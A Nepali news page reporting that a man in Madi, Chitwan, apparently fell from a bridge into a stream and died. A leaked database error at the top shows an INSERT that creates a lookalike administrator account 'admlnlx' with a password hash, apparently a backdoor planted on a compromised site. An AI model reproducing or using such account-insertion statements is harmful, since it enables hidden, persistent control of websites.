WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnHt64rBpAHV.1Lu.yIE7QnotzElyd/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 10:24:36', '', 'admlnlx', 'admlnlx')
चितवन, माघ २३–
चितवनको माडी नगरपालिका–२ मा एक पुरुष मृत भेटिएका छन् ।
भैरबपुर निवासी अन्दाजी ४० वर्षीय चित्रबहादुर बि.क.आज मृत अवस्थामा फेला परेको माडी प्रहरीले जनाएको छ । सोहि गाउँमा रहेको भ्यागुते खोलामा खस्दा बि।क।को मृत्यु भएको हो । बिहान करिब ८ बजेको समयमा घर वि.क. एक्लै बाहिर निस्केका थिए । टाउँको दुख्ने समस्याले ग्रसित वि.क. रिङगटा लागेर पुलबाट खोलामा खसेको हुन सक्ने प्रहरीले अनुमान गरेको छ ।